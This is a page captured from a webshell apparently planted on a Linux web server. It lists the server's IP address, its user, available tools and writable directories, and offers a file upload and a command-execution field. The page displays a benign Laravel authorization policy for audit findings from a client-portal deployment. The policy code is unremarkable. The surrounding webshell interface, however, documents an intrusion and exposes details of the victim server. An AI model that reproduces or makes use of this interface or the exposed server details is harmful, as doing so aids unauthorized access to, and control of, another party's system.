403Webshell
Server IP : 35.80.110.71  /  Your IP : 216.73.216.221
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ip-172-31-21-44 6.17.0-1019-aws #19~24.04.1-Ubuntu SMP Tue Jun 23 18:53:06 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/client-portal-laravel/releases/20260626120707/app/Policies/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/client-portal-laravel/releases/20260626120707/app/Policies/AuditFindingPolicy.php
<?php

namespace App\Policies;

use App\Models\AuditLibrary\AuditFinding;
use App\Models\Core\User;

class AuditFindingPolicy
{
    /**
     * Determine whether the user can view any findings.
     */
    public function viewAny(User $user): bool
    {
        return true;
    }

    /**
     * Determine whether the user can view the finding.
     */
    public function view(User $user, AuditFinding $finding): bool
    {
        if ($user->isAdmin()) {
            return true;
        }

        $audit = $finding->audit;

        // Client users can only see findings on visible audits for their clients
        if (! $audit->client_visible) {
            return false;
        }

        return $user->belongsToClient($audit->client);
    }

    /**
     * Determine whether the user can create findings.
     */
    public function create(User $user): bool
    {
        return $user->isAdmin();
    }

    /**
     * Determine whether the user can update the finding.
     */
    public function update(User $user, AuditFinding $finding): bool
    {
        if (! $user->isAdmin()) {
            return false;
        }

        // Can only update findings on editable audits
        return $finding->audit->is_editable;
    }

    /**
     * Determine whether the user can delete the finding.
     */
    public function delete(User $user, AuditFinding $finding): bool
    {
        return $user->isAdmin() && $finding->audit->is_editable;
    }

    /**
     * Determine whether the user can add a comment to the finding.
     */
    public function addComment(User $user, AuditFinding $finding): bool
    {
        if ($user->isAdmin()) {
            return true;
        }

        $audit = $finding->audit;

        // Clients can comment on visible audits for their clients
        return $audit->client_visible && $user->belongsToClient($audit->client);
    }

    /**
     * Determine whether the user can upload evidence to the finding.
     */
    public function uploadEvidence(User $user, AuditFinding $finding): bool
    {
        return $user->isAdmin() && $finding->audit->is_editable;
    }

    /**
     * Determine whether the user can mark the finding's remediation as resolved.
     */
    public function markResolved(User $user, AuditFinding $finding): bool
    {
        if ($user->isAdmin()) {
            return true;
        }

        $audit = $finding->audit;

        // Clients can mark resolution on visible audits for their clients
        return $audit->client_visible && $user->belongsToClient($audit->client);
    }

    /**
     * Determine whether the user can update remediation status.
     */
    public function updateRemediation(User $user, AuditFinding $finding): bool
    {
        return $user->isAdmin();
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit